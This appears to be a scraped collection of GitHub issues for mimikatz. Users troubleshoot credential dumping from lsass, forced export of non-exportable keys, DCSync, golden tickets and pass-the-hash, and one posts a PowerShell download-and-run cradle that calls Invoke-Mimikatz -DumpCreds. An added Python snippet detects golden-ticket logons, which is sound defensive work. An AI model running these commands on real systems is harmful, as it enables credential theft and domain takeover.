gentilkiwi / mimikatz
A little tool to play with Windows security
Home Page: http://blog.gentilkiwi.com/mimikatz
How to create a Log at a specific location using a batch file?
I currently use "mimikatz.exe privilege::debug log sekurlsa::logonpasswords" and need a way to make the log save to U:/results/mimikatz.txt
See https://creativecommons.org/faq/#can-i-apply-a-creative-commons-license-to-software
I recommend to choose another license.
Is there a method to execute mimikatz with an application called Deep Freeze? Can someone help me with this please?
on win8.1 32 bits the pattern for cng patch is
{0xf6, 0x43, 0x1c, 0x02, 0x75} but should be {0xf6, 0x47, 0x1c, 0x02, 0x75}
just patched it and it works well now.
i have not tested with win8.0 but maybe the two different patterns are linked to 32/64 bits instead of win8.0/win8.1 versions ?
Hello Benjamin,
I get the error "kull_m_memory_copy (0x00000005)" when trying to use PTH with Windows 10 Build 10.0.14393 (Windows 10 Enterprise). Credential dumping works as usual.
I attached the log file, thanks for any advice you can give.
mimi.txt
Best regards,
Christoph
Warning 2 warning C4996: 'wcsicmp': The POSIX name for this item is deprecated. Instead, use the ISO C++ conformant name: _wcsicmp. See online help for details. G:\mimikatz\mimikatz\modules\kuhl_m_sid.c 263 1 mimikatz
and i solve with this... adding _CRT_NONSTDC_NO_DEPRECATE to preprocessor definitions.
this happens only in VS2013 ? thank you!
and thank u for ur excellent work!!!
Salut Benjamin,
it seems that mimikatz 2.1 from 06 May stopped working on windows 10 systems with activated Virtual Secure Mode and current patch sets installed.
To be precise, the commands "logonpasswords" and "msv" have become broken.
We obtain an endless list of values for the LSA Isolated Data attribute "Encrypted", or alternatively a crash popup "mimikatz for Windows has stopped working".
We tried it with a Microsoft Surfacebook (with TPM 2.0)
Windows 10 Enterprise (US) version 1511
OS Version: 10586.0 and 10586.318
LsaIso Version: 10.0.586.0 and 10.0.10586.212
At the end we used the newest Windows Patch:
May 10, 2016 — KB3156421 (OS Build 10586.318)
This update includes quality improvements and security fixes. No new operating system features are being introduced in this update. Key changes include:
Fixed additional security issues with kernel mode drivers, remote procedure calls, the Microsoft Graphics Component, Internet Explorer 11, Microsoft Edge, Windows Shell, Windows Journal,
Virtual Secure Mode, Schannel, and Jscript.
Greetings from Germany,
Jürgen
M
Following is a session transcript of mimikatz which triggers the crash popup:
.#####. mimikatz 2.1 (x64) built on May 6 2016 01:28:44
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 19 modules * * */
ERROR kull_m_busylight_devices_get ; CreateFile (deviceHandle) (0x00000020)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 6164539 (00000000:005e103b)
Session : Interactive from 3
User Name : admin
Domain : COMPANY
Logon Server : DC1
Logon Time : 18.05.2016 13:17:47
SID : S-1-5-21-504569365-2122958605-3922303804-1108
msv :
[00000003] Primary
* Username : admin
* Domain : COMPANY
* LSA Isolated Data: lmHash)
߶??¤ðgAÆL4$?ð?k¨ø,¨è¬??À*�Ÿ¶p?r?ßç®�~V�ý 'ÆK¡ó?ó^è4 ±ö�-äb"£Ûæ
Unk-Key : 701857763ed94172143552903b20950a2fb1fc0488884e0d9ed4e1c3bc80ebd1838f736e3b7492dea90780caa6fd0100
Encrypted:
hello, i ran mimikatz on windows server 2008 and i can't fix that
mimikatz #privilege::debug
Privilege '20' OK
mimikatz # misc::skeleton
ERROR kuhl_m_misc_skeleton ; kull_m_process_getVeryBasicModuleInformationsForName (0x00000000)
i Got This error :
mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_nt5_init ; kull_m_memory_search
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed
Has a new version of Mimikatz been published recently? I expected it happen a long time.
Hi, When trying to run mimikatz through the Invoke-Mimikatz.ps1 on a normal cmd it works fine,
when trying to run it through a python script such as:
command = "powershell.exe -ExecutionPolicy unrestricted ; IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:1234/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
os.system(command)
It fails and gives me the following output:
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (May 20 2014 08:55:05)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
mimikatz(powershell) # exit
Bye!
Any help?
win10, it doesn't work. Can you fix it ?
Hi,
I am experimenting with sidhistory, but the sid module only seems to have the lookup and query function, the add and modify functions are missing in version 2.1 alpha 20160506.
or, what am I missing
Merci!
lsass.exe dump from Windows 2003 Server
procdump.exe -accepteula -o -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
**ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (5) != MIMIKATZ_NT_MAJOR_VERSION (6)
I use 32 bit version for x86.
Tested on Windows 8.1 Update 1 dump.
kd:x86> .load c:\mimilib.dll
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 10 2014 01:53:29)
.## ^ ##. Windows build 9600
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
32.0: kd:x86> !process 0 0 lsass.exe
32.0: kd:x86>
Unable to read _LIST_ENTRY @ fffff80194eb10a0
Error 1 error LNK2001: unresolved external symbol __imp__IsCharAlphaNumericW@4
thanks!
mimikatz open in admin mode.. windows 8.1 x64
What i did wrong? I must extract this cert to sign over 2000 pdf :/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. Lucyna G Key Container : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
Provider : cryptoCertum3 CSP - profil bezpieczny
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 2048
Public export : OK - 'CURRENT_USER_My_0_Lucyna GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. Lucyna G Key Container : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
Provider : cryptoCertum3 CSP - profil bezpieczny
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 2048
Public export : OK - 'CURRENT_USER_My_0_Lucyna GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)
Running DCSync against domains that have been renamed ends with this message:
ERROR kuhl_m_lsadump_dcsync ; RPC Exception 0x00002191 (8593)
That error code stands for
The directory service cannot perform the requested operation because the servers involved are of different replication epochs (which is usually related to a domain rename that is in progress).
Probable cause: Mimikatz does not set the DRS_EXTENSIONS_INT::dwReplEpoch value, so it always defaults to 0. But each domain rename increments this counter on DCs and if the client and the server are not in the same epoch, the server simply refuses to send replication changes.
Possible solution: IDL_DRSBind should be called again with the epoch that the server returns in the first call, if it is not 0.
Hey everyone,
really nice program! Congrats and thank you very much!
Though, I'm getting an error on Windows 7:
When running privilege::debug
I'm getting "ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege <20> c0000061"
and when running "sekurlsa::logonpasswords" I'm getting "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <0x00...5>"
Is there any get around?
Hi Ben!
I wanted to start a discussion about how we might work together to separate the UX/Console code from the core library that makes up the Mimikatz functionality. From there, I aim to wrap up the core library as a Meterpreter extension (ie. the kiwi extension that you already know!).
The reason I'm keen to do this here is because keeping the code in sync is a tough gig, especially given the rate at which you churn out features!
Are you open to teaming up and working on teasing the bits apart a little so that it's easier for us poor MSF folk to keep your latest and greatest stuff in Metasploit?
Cheers for all your awesome work, as always.
Hi all,
Is there any official documentation? Is there any appetite to create one?
One unofficial can be found in adsecurity blog.
Cheers,
Andreas
Link is:
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
Learned a lot from this, thank you so much!
And a little advice:
Installation and configuration of OpenSSL is very troublesome.
And I think there is an easier way:)
We can use cert2spc.exe and pvk2pfx.exe.
They are all included in the Microsoft Windows SDK and can be run separately.
The code is:
cert2spc.exe B53C6DE283C00203587A03DD3D0BF66E16969A55.der public.spc
pvk2pfx.exe -pvk raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -pi test -spc public.spc -pfx cert.pfx -f
I hope you will like it~
del
Salut Benjamin,
we tried the newest builds of mimikatz 2.1 alpha 20160602 / 20160525
Windows 10 Build 10240 RTM: PTH ok; PTT not working
Windows 10 Build 10586 Version 1511: PTH not working; PTT not working
Windows 7 SP1 PTH ok; PTT ok
The output of mimikatz claims that everything went "ok" in all six cases.
Greetings,
goldfinger2
i came across mimikatz when looking for a method to retrieve a "non exportable" key from a windows computer. the anti virus software running on the computer i happened to be using to download mimikatz flagged the software as a virus. this isn't particularly compelling, but in the interest of self preservation, and somewhat on a whim, i decided to investigate a little more. i uploaded mimikatz.exe to virustotal, which reported this analysis:
i'm accustomed to the world of crappy anti virus software and constant false positives, but it was a bit surprising to see so many claiming mimikatz to be a trojan, rootkit, malware, etc., but not find any references to this in the various resources discussing its use.
is this just an inevitable nuance, given the nature of this software, and happens to be little more than a coincidence? if nothing else, i thought the author[s]/community might be interested to know this [even if it's just for the sake of being informed on principle], assuming it's not something which has already been mentioned.
I'm playing around with Kerberos dumping and cracking. I'm starting mimikatz and running "standard::base64" so that all the .kirbi files get exported using base64 encoding. However once I execute "kerberos::list /export" using base64, there are no output files in my directory. Mimikatz only saves .kirbi files when I DON'T use base64 encoding.
Hey,
I have seen some clients increasingly detect golden ticket activity with mimikatz-generated tickets based on the event log login of a domain of "<3 eo.oe ~ ANSSI E>". I see that this value is hardcoded in located here:
Is there a reason that this is hardcoded instead of dynamic? A providable domain name would be awesome here
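The detection described in the post above, as an added example (not code from the original post or from the mimikatz project): it scans logon-type event records for the default domain string quoted in the post and, going one step further, for any domain value that is not on an allow-list of the environment's real domains. The event records are constructed for illustration, and the allow-list entries and the helper names are assumptions to adapt locally.

```python
from typing import Iterable, Optional

# Default domain string quoted in the post above.
DEFAULT_TICKET_DOMAIN = "<3 eo.oe ~ ANSSI E>"

# Event fields that carry an account domain in Windows Security events.
DOMAIN_FIELDS = ("TargetDomainName", "SubjectDomainName")

# Assumption: allow-list of domain values expected in this environment,
# including built-in authorities and the "-" placeholder for empty subjects.
KNOWN_DOMAINS = {"COMPANY", "COMPANY.LOCAL", "NT AUTHORITY", "-"}


def normalise(name: str) -> str:
    """Compare domain names case-insensitively and ignore padding."""
    return name.strip().upper()


def classify_domain(value: str, known: set) -> Optional[str]:
    """Return a finding reason for a domain value, or None if it is expected."""
    if value == DEFAULT_TICKET_DOMAIN:
        return "hardcoded-default"
    if normalise(value) not in known:
        return "unknown-domain"
    return None


def find_suspicious_logons(events: Iterable[dict], known_domains: set) -> list:
    """Flag every event whose domain field is the default string or unknown."""
    known = {normalise(d) for d in known_domains}
    findings = []
    for ev in events:
        for field in DOMAIN_FIELDS:
            value = ev.get(field)
            if not value:
                continue  # field absent in this event type
            reason = classify_domain(value, known)
            if reason:
                findings.append({
                    "EventID": ev.get("EventID"),
                    "Computer": ev.get("Computer"),
                    "User": ev.get("TargetUserName") or ev.get("SubjectUserName"),
                    "Field": field,
                    "Domain": value,
                    "Reason": reason,
                })
    return findings


# Constructed sample records (not real logs), shaped like exported EventData.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "SRV01", "TargetUserName": "admin",
     "TargetDomainName": "COMPANY", "SubjectDomainName": "-"},
    {"EventID": 4624, "Computer": "SRV01", "TargetUserName": "admin",
     "TargetDomainName": DEFAULT_TICKET_DOMAIN, "SubjectDomainName": "-"},
    {"EventID": 4672, "Computer": "SRV02", "SubjectUserName": "svc_backup",
     "SubjectDomainName": "company"},
    {"EventID": 4624, "Computer": "SRV03", "TargetUserName": "admin",
     "TargetDomainName": "COMPNAY", "SubjectDomainName": "-"},
    {"EventID": 4624, "Computer": "SRV03", "TargetUserName": "SYSTEM",
     "TargetDomainName": "NT AUTHORITY", "SubjectDomainName": "-"},
]

if __name__ == "__main__":
    for f in find_suspicious_logons(SAMPLE_EVENTS, KNOWN_DOMAINS):
        print(f"{f['Reason']:18} {f['Computer']} {f['User']} {f['Field']}={f['Domain']!r}")
```

The allow-list check is the part that keeps working if the domain field is set to something other than the default string, since any value that does not match a real domain name is reported.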
Hi Ben,
I just wonder if you could add support for passing command line parameters to the binaries executed by sekurlsa::pth. Or have I just missed this feature?
And thx again for your great work.
Hi @gentilkiwi ,
knowing that DCSync had problem with AD Recycle Bin being enabled, I tried it against a Windows Server 2016 TP5 DC with the Privileged Access Management Feature on, just out of curiosity. And guess what, it ends with error 8236 (The server does not support the requested critical extension), just as my own DSInternals does.
The solution will involve more than just fun with flags, as it was with DRS_EXT_RECYCLE_BIN, because the updated Doc states this: GR9 (DRS_EXT_GETCHGREPLY_V9, 0x00000100): If present, signifies that the DC supports DRS_MSG_GETCHGREPLY_V9. The DRS_MSG_GETCHGREPLY_V9 message basically adds link expiration timestamp to DRS_MSG_GETCHGREPLY_V6.
@asolino This issue most probably affects Impacket, too, though I cannot verify it right now.
Cheers
Michael
Erm hello I'm trying to get the password to a lappy running on windows 8.1,running on the current version of mimikatz on a 64bit
Before (windows 8) typing in Privilege::debug followed by sekurlas::Logonpasswords would work.
Now (windows 8.1) I'm getting a null for the password.
Could you help me by giving the commands to find the password for 8.1, please explain this to me I have no idea how any of this works.
Thanks.
1>kuhl_m_kerberos_ccache.obj : error LNK2001: external symbol RtlAnsiStringToUnicodeString unresolved
thanks
Salut Benjamin,
as we expected, mimikatz 2.1 from 08 August doesn't work with the Windows 10 Build 1607 and Credential Guard
Windows 10 Enterprise (US) version 1607
OS Version: 14393.10
LsaIso Version: 10.0.14393.0
We attached the lsass dump file created by the taskmanager.
Greetings from Germany,
Jürgen
lsass-1607.zip
mimikatz How to Export Record?
Can you tell about it?
Hi,
I have a certificate with a private key marked as non-exportable. I use mimikatz to export the certificate:
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. xxxxx
Key Container : !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
Provider : Symantec PKI Client CSP
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 2048
Public export : OK - 'CURRENT_USER_My_0_ xxxxx.der'
Private export : OK - 'CURRENT_USER_My_0_ xxxxx.pfx'
I then use openssl to extract the public certificate and private key:
openssl pkcs12 -in my.pfx -out cert.pem -nokeys
openssl pkcs12 -in my.pfx -out key.pem -nocerts
The resulting cert.pem looks fine but key.pem has size 0. When I run:
certutil -user -store My
I get the following output:
My
================ Certificate 0 ================
Serial Number: 73f1964b9c30379490fa6db433e9ea96
Issuer: CN=xxxxx, O=xxxxx
NotBefore: 2/19/2016 4:00 PM
NotAfter: 2/19/2017 3:59 PM
Subject: OU=MULTI-ALLOWED, OU=RACERT, CN=xxxxx, CN=xxxxx
Non-root Certificate
Template:
Cert Hash(sha1): a4 2a 9e 45 95 8d 92 c6 43 d5 42 a3 c4 b6 19 af 21 fc 3c f7
Key Container = !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
Provider = Symantec PKI Client CSP
Private key is NOT exportable
ERROR: Could not verify certificate public key against private key
CertUtil: -store command completed successfully.
Do you know why I cannot export the private key? Thanks.
Since this change.... 0666f21
KrbCredExport (https://github.com/rvazarkar/KrbCredExport) and "kirbikator" does not recognize golden tickets format, obviously generated with mimikatz
C:\Users\yo\mimikatz\x64>kirbikator ccache cid63212.kirbi
.#####. KiRBikator 1.1 (x86) built on Jan 18 2016 01:57:51
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com (oe.eo)
'#####' * * */
Destination : MIT Credential Cache (simple)
< cid63212.kirbi : format not recognized!
AND
C:\Users\yo\mimikatz\x64>KrbCredExport.py cid63212.kirbi cid63212.ccache
Ticket File Found, Converting to ccache
Traceback (most recent call last):
File "C:\Program Files (x86)\Python27\Scripts\KrbConvert.py", line 52, in <module>
KrbCred.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 88, in parsefile
self.ticketpart.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 57, in parsefile
self.encpart.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 24, in parsefile
self.krbcredinfo.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 300, in parsefile
self.starttime.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 185, in parsefile
self.time = Time.convert_to_unix(strtime)
File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 170, in convert_to_unix
t = datetime.datetime.strptime(timestr[:-1], '%Y%m%d%H%M%S')
File "C:\Program Files (x86)\Python27\lib\_strptime.py", line 332, in _strptime
(data_string, format))
ValueError: time data "\x1c\xa7\xcc(A'\xfa\xef\xa0\x16\xb1*B\x95" does not match format '%Y%m%d%H%M%S'
C:\Users\yo\mimikatz\x64>python --version
Python 2.7.12
Windows 10 x64 ver 1511
thank you!!
Just curious about why Windows 10 passwords are showing up as null for I was trying to remember how you get around it showing null but forgot why again the password shows up null someone refresh my memory again.
Ran it as Admin, had Smartscreen off and turned off Bit Defender, but I think there was something you had to do to get it to show the password.
I try to use mimikatz on Windows 10 Pro N (Build 1511) on VirtualBox but it gives me the following error when i use privilege::debug
and can't begin my analysis
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
Hello Benjamin,
I'm facing a crash with the latest mimikatz when trying to export tickets from the sekurlsa
module on a Windows Server 2012 R2 Evaluation system.
The command I launched: mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit".
You can find here below:
systeminfo
.Crash_mimikatz_sekurlsa_tickets_export.zip
Cheers.
Thanks for the great tool 👍
I am unable to open generated log file when using "mimikatz 2.1 (x64) built on May 25 2016 00:19:15" as below, getting 'Access Denied' alert
However if I use it as below, I am able to open generated log file
mimikatz # log b5.txt
Using 'b5.txt' for logfile : OK
mimikatz # sekurlsa::minidump procdump_64_192.168.56.50.dmp
Switch to MINIDUMP : 'procdump_64_192.168.56.50.dmp'
mimikatz # sekurlsa::logonPasswords full
Opening : 'procdump_64_192.168.56.50.dmp' file for minidump...
Authentication Id : 0 ; 1665464 (00000000:001969b8)
Session : Interactive from 0
User Name : Administrator
The client machine on which I want to inject the TGT is non-domain joined system. getting this message after giving the needed command
http://s17.postimg.org/wyboxc8n3/123.png
What I am doing wrong?
Thanks.
First of all this seems to be a great tool, thanks.
When I try to export my certificate it is exported without the private key, which doesn´t help me.
System info: Windows 2008 Server R2 64bits
mimikatz 2.1 x64 (downloaded today)
At some point I get error:
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)
I made sure I opened command prompt using the "Run as Administrator" and went over UAC. Because of that I´m assuming I have ACL permissions on the private keys.
I am sure the key is not there because when I use openssl to verify pfx (openssl pkcs12 -info) the BEGIN ENCRYPTED PRIVATE KEY is not there. And when I try to extract the key to a .pem (openssl pkcs12 -in pfx -out pem) the output file is empty.
Can you help?
Output (broken lines kept, sorry):
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:My /export
* System Store : 'CERT_SYSTEM_STORE_LOCAL_MACHINE' (0x00020000)
* Store : 'My'
0. wantedCert.com
Key Container : {some_key}
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Provider type : RSA_FULL (1)
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)
Public export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.der'
Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.pfx'
1. WMSvc-IISDefaultCertificate
Key Container : WMSvc Certificate Key Container
Provider : Microsoft RSA SChannel Cryptographic Provider
Provider type : RSA_SCHANNEL (12)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : YES
Key size : 2048
Public export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.der'
Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.pfx'
On win 10, if you open mimikatz and try to get the passwords, you can not get it because it is impossible, I tried with all: open like administrator,
-privileges::debug
"privilege 20 OK"
-sekurlsa::logonpasswords
"ERROR kuhl_m_sekurlsa_acquireLSA ; Modules Informations"
-lsadump::cache
"Domain: "
"Syskey: *******************"
"ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_regOpenKeyEx (SECURITY) (0x00000005)"
-lsadump::sam
"Domain: ***"
"Syskey: ****************************"
"ERROR kuhl_m_lsadump_getUsersandSamKey ; kull_m_registry_regOpenKeyEx SAM accounts (0x00000005)"
Pls gentilkiwi help me.
I get an error when trying to patch CNG:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000005)
I tried to run mimikatz as Administrator and SYSTEM (via PsExec).
Hi,
I'd like to raise a feature request to support both English and French natively. I'd like to offer to spend the time to translate any french text to English. Is there a simple way to extract all text currently being used and to merge translations back in once done? Also happy to translate any documentation that is not yet in English.
Please let me know if this will be possible!
Cheers,
-T
Since Mimikatz is able to inject the ccache files generated in Linux, would it be possible to write a parser that can run under Linux to generate .kirbi files from the ccache file? I've tried to look into the code (kuhl_m_kerberos_ccache), but since nothing is commented I'm having a hard time to get into it.
Salut Benjamin,
the new mimikatz version from Aug 12 is working with Windows Build 1607 with and without Credential Guard. :-)
But we have a little issue together with Remote Credential Guard (RCG).
We used the following setup:
Source (RPC Client) Windows Build 1607 with Credential Guard protected
Target Windows Build 1607 without Credential Guard
We made a RPC-connection with the parameter "/remoteguard" to the target.
After running mimikatz on the target machine it will crash. (See attachments)
Maybe the problem is that the TGT-ticket on the target machine is a copy of the TGT-ticket of the source machine but without the session key. This is why the target must call back to the source to use his session key to decrypt the response from the TGS of the new service tickets.
Greetings from Germany
Juergen